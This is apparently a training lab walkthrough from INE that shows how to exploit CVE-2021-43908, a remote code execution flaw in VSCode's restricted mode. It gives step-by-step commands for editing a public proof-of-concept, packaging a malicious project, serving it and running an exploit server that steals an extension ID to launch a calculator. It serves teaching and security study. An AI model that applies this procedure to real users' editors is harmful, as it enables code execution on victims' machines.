Resources
    [CVE-2021-43908] VSCode R ...
    21 November 22

    [CVE-2021-43908] VSCode RCE

    Posted byINE
    facebooktwitterlinkedin
    news-featured

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Technical difficulty: Beginner

    Introduction

    During the last quarter of 2021, an interesting RCE vulnerability affecting VSCode was made public. This vulnerability affected the application even when opening a folder in the restricted mode provided by VSCode. This vulnerability was assigned the CVE ID of CVE-2021-43908 and was patched in November 2021 (version 1.63) of the VSCode application.  

    This bug was discovered by the researchers going by the aliases TheGrandPew and s1r1us. The researchers have documented their research in [this blog post](https://blog.electrovolt.io/posts/vscode-rce/), covering the complete attack chain to trigger this RCE vulnerability!  

    The gist of the vulnerability, as stated by the authors, is:  

    Remote Code execution can be achieved when a victim opens a markdown file in a maliciously crafted VSCode Project or a folder even in VSCode Restricted Mode. 

    In this lab, we will learn to exploit the RCE vulnerability in VSCode by opening a malicious project sent by the attacker to the victim user.  

    Lab Environment

    In this lab environment, the user is going to get access to a Kali GUI instance along with two sessions to a Windows machine with student and Administrator user accounts. The Windows machine is available on the following domain name: demo.ine.local  

    Objective: Exploit the RCE vulnerability affecting VSCode (CVE-2021-43908).  

    Note: During exploitation, you might need to relax the VSCode settings to enable content loading over http served from localhost. This is unnecessary, as you will find in the solution, but it's the quick way to check the PoC for this RCE vulnerability. The other route is more involved, but it is mentioned in the solution for those interested in learning the practicalities of this attack.  

    Tools

    The best tools for this lab are:

    - Nmap

    - NodeJS

    - Python

    - Zip

    - A web browser

    - Visual Studio Code (or VSCode for short)

    Step 1: Open the lab link.  

    In this lab, we receive two machine instances:  

    1. Kali Machine: A Kali GUI instance containing the exploit server files and the malicious project files that when opened, trigger the VSCode RCE vulnerability.  

    vscode_rce_1.png

    2. Attacker Machine: A Windows machine with a student account used to start the exploit server and deliver the exploitation payload.  

    vscode_rce_1_1.png

    3. Target Machine: The same Windows machine as above with the Administrator account, used to simulate a victim where you would open a malicious project inside VSCode in restricted mode.  

    vscode_rce_1_2.png

    The Kali machine contains all the files relevant for exploitation, and the Windows student machine would be the one where we will run our exploit server. We will open a malicious markdown file on the same Windows machine with an Administrator account in the VSCode application.  

    The end goal would be to spawn a calculator instance.  

    Step 2: Check the availability of the target Windows machine.  

    The target Windows machine is located at the domain demo.ine.local:  

    Command:  

    ping -c3 demo.ine.local

    vscode_rce_2.png

    The target Windows machine is reachable.  

    Step 3: Scan the target Windows machine for open ports.  

    Command:  

    nmap -sS -sV demo.ine.local

    vscode_rce_3.png

    Step 4: Check the VSCode version in the Target Machine.  

    Navigate to the Target Machine:  

    vscode_rce_4.png

    Open VSCode from the taskbar:  

    vscode_rce_4_1.png

    Click on Help > About:  

    vscode_rce_4_2.png

    That would show a dialog box containing the VSCode version information:  

    vscode_rce_4_3.png

    Version: 1.61.0 (system setup)

    Commit: ee8c7def80afc00dd6e593ef12f37756d8f504ea

    Date: 2021-10-07T18:13:09.652Z

    Electron: 13.5.1

    Chrome: 91.0.4472.164

    Node.js: 14.16.0

    V8: 9.1.269.39-electron.0

    OS: Windows_NT x64 10.0.17763

    The VSCode version seems quite old - it was last updated almost a year ago, as of this writing!  

    Step 5: Search for information on VSCode RCE CVE-2021-43908.  

    Search Query:  

    VSCode RCE CVE-2021-43908

    vscode_rce_5.png

    Open the ElectroVolt.io blog page:  

    URL: https://blog.electrovolt.io/posts/vscode-rce/  

    Note: It is advised to read the original post of the researchers to understand the complete attack and then use this lab as a supplement to try their research firsthand with this hands-on lab. This will be much more beneficial as, to avoid repetition, we have kept this manual short to cover the exploitation of the vulnerability!  

    vscode_rce_5_1.png

    Notice the summary of the vulnerability:  

    Remote Code execution can be achieved when a victim opens a markdown file in a maliciously crafted VSCode Project or a folder even in VSCode Restricted Mode.

    Navigate back to the search results:  

    1.png

    Open the MSRC portal page:  

    URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43908  

    Open the Release Notes:  

    vscode_rce_5_3.png

    URL: https://code.visualstudio.com/updates/v1_63  

    Notice the VSCode version, when this vulnerability was fixed, is mentioned on this page:  

    vscode_rce_5_4.png

    The patched version was: November 2021 (version 1.63).  

    This means the provided VSCode version (1.61.0) is vulnerable to the aforementioned RCE vulnerability.  

    Step 6: Inspect the provided exploitation files.  

    The exploit PoC is referenced from the following GitHub repository:  

    URL: https://github.com/Sudistark/vscode-rce-electrovolt/  

    vscode_rce_6.png

    The exploit files are provided in the challenge-files directory located on the Desktop:  

    Commands:  

    ls -al ~/Desktop/challenge-files/

    ls -al ~/Desktop/challenge-files/vscode-rce-poc/

    vscode_rce_6_1.png

    The exploit.md file is what initiates the complete exploitation chain by sending a request to the attacker server to leak the extension ID and receive the payload.  

    The rce.html file contains the JS payload to open a calculator app.  

    The code directory contains the code run by the attacker to steal the extension ID and send the payload to the VSCode app.  

    Command:  

    ls -al ~/Desktop/challenge-files/vscode-rce-poc/code/

    2.png

    Navigate to the directory of the provided files and check the provided VSCode settings file:  

    Commands:  

    cd ~/Desktop/challenge-files/vscode-rce-poc/

    ls -al

    cat .vscode/Settings.json

    vscode_rce_6_3.png

    Remove the highlighted line:  

    Command:  

    cat .vscode/Settings.json

    vscode-rce-6_4.png

    Step 7: Alter the IP address and paths in the exploitation files and package the Zip for the target Windows machines.  

    Check the contents of the exploit.md and rce.html files:  

    Command:  

    cat exploit.md

    cat rce.html

    3.png

    Notice the highlighted URL:  

    URL: https://felineintelligentbytes.kacegi6947.repl.co/  

    We have to alter this as any public URLs are not accessible from the lab instance. Instead, we will put http://localhost:3000 in its place since we would run the exploit server locally on the target Windows machine as a low-privileged user account (student).  

    Check the contents of the code/main.js file:  

    Command:  

    cat code/main.js

    vscode_rce_7_1.png

    vscode_rce_7_2.png

    We need to modify the URL and the installation path of the VSCode.  

    The installation path for VSCode can be found from the Windows machine:  

    vscode-rce-7_3.pngvscode-rce-7_4.png

    Installation Path:  

    C:\Program Files\Microsoft VS Code\resources\app

    Replace backslash (\\) with forward slash (/) and encode the spaces (as %20):  

    Installation Path:  

    C:/Program%20Files/Microsoft%20VS%20Code/resources/app

    Now we can place this value in the code/main.js file.  

    After URL and VSCode installation path modifications, the exploit.md and code/main.js files should look like this:  

    Command:  

    cat exploit.md

    vscode-rce-7_5.png

    Command:  

    cat code/main.js

    vscode-rce-7_6.png

    vscode-rce-7_7.png

    Archive the exploit files to be opened in VSCode:  

    Commands:  

    zip -r evil-repo.zip exploit.md rce.html .vscode

    unzip -t evil-repo.zip

    vscode-rce-7_8.png

    Archive the exploit files run by the attacker (student user in this case):  

    Command:  

    zip -r exploit-code.zip code

    vscode_rce_7_9.png

    Step 8: Transfer the exploitation files to the target Windows machine and exploit the VSCode app.  

    Check the IP address of the Kali GUI instance:  

    Command:  

    ip addr

    4.png

    The IP address of the Kali GUI instance is 10.10.27.2.  

    Note: The IP address of your Kali GUI instance would be different, so make sure to check its IP and use that to download the files to the target Windows machine!  

    Start a Python-based HTTP server to transfer files to the Windows machine:  

    Command:  

    python3 -m http.server 80

    vscode_rce_8_1.png

    Open the Firefox browser in the Attacker Machine and open the following URL:  

    URL: http://10.10.27.2  

    Note: The IP address of your Kali GUI instance would be different, so make sure to check its IP and use that to download the files to the target Windows machine!  

    Download the exploit-code.zip file.  

    5.png

    Extract the downloaded file:  

    vscode-rce-8_3.png

    vscode-rce-8_4.png

    Navigate to the extracted folder and start the exploit server:  

    Commands:  

    cd .\Downloads\exploit-code\code\

    ls

    node .\main.js

    vscode-rce-8_5.png

    The exploit server has started and listens on port 3000 on the Windows machine.  

    Notice that we have used the student account to launch the exploit server.  

    Head over to the Target Machine and open the following URL in the Firefox browser:  

    URL: http://10.10.27.2   

    Note: The IP address of your Kali GUI instance would be different, so make sure to check its IP and use that to download the files to the target Windows machine!  

    Download the evil-repo.zip file.  

    vscode_rce_8_6.png

    Extract the downloaded file:  

    vscode-rce-8_7.png

    vscode_rce_8_8.png

    Open the extracted folder in VSCode:  

    vscode_rce_8_9.png

    vscode-rce-8_10.png

    Select No, I don't trust the authors to open this folder in restricted mode:  

    vscode-rce-8_11.png

    Open exploit.md file:  

    vscode_rce_8_12.png

    Recall the .vscode/Settings.json file. It contained an entry for \*.md files. What the file meant, in essence, was to show all the markdown files are shown in preview mode by default.  

    So opening the exploit.md file would show the markdown preview:  

    vscode_rce_8_13.png

    On the right side, you can see Some content has been disabled in this document.  

    Click on that warning and select Allow insecure local content Enable content loading over http served from localhost.  

    vscode-rce-8_14.png

    Why have we done so?  

    This has been done because, by default, only content loaded from an HTTPS site is considered secure, but since we have served the exploit over HTTP on localhost, VSCode shows this warning. Since we are trying to reproduce the issue and see how we can leverage VSCode to pop a calculator, we had to select this insecure setting. An alternative way would have been to host this NodeJS server over HTTPS, but that would have required using certificates trusted by the VSCode app.  

    Once we have relaxed the security for localhost, the markdown file gets rendered, and the exploitation starts:  

    vscode-rce-8_15.png

    Note: You might see an error in the window where the NodeJS exploit server was running about being htmlPOC not defined. That happened because VSCode does not trust the localhost over HTTP. If you experience issues with the exploitation even after relaxing the VSCode security settings, you can restart the NodeJS exploit server.  

    After a few seconds (3 to be precise), you should see an iframe:  

    vscode-rce-8_16.png

    Soon after that, a calculator would pop up:  

    vscode-rce-8_17.png

    Open the Attacker Machine where the exploit server was running:  

    vscode-rce-8_18.png

    Notice the extension ID was successfully stolen by the server, and that's how the exploit proceeded.  

    If you let the server run and keep the exploit.md file open, you would notice that the calculator keeps popping up as the exploit never stops.  

    Stop the exploit server by pressing CTRL+C to avoid multiple calculator instances from being popped up.  

    vscode_rce_8_19.png

    Navigate back to the Target Machine and press CTRL+P:  

    Type the following in the input box that shows up:  

    >developer: open webview

    vscode-rce-8_20.png

    Select the only entry that shows up and that should up the browser-like console:  

    vscode-rce-8_21.png

    This window would help inspect the exploit in action.  

    Now start back the exploit server in the Attacker Machine:  

    6.png

    Head back to the Target Machine and reopen (close and open) the exploit.md file.  

    Notice the requests made to the exploit server to steal the extension ID:  

    7.png

    Next, the iframe is opened:  

    8.png

    Next, the rce.html gets triggered that pops up a calculator instance:  

    9.png

    If you keep the exploit server running and the exploit.md file opened, you notice that the calculator instances keep popping up:  

    10.png

    You can also inspect more details by checking the Network tab or utilizing the breakpoints and seeing how things work in this exploit.  

    With that, we conclude this lab on VSCode RCE (CVE-2021-43908).  

    References

    Visual Studio Code - Remote Code Execution in Restricted Mode (CVE-2021-43908)

    Visual Studio Code Spoofing Vulnerability: CVE-2021-43908

    VSCode Updates: November 2021 (version 1.63)

    PoC: vscode-rce-electrovolt

    Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    © 2024 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
    instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo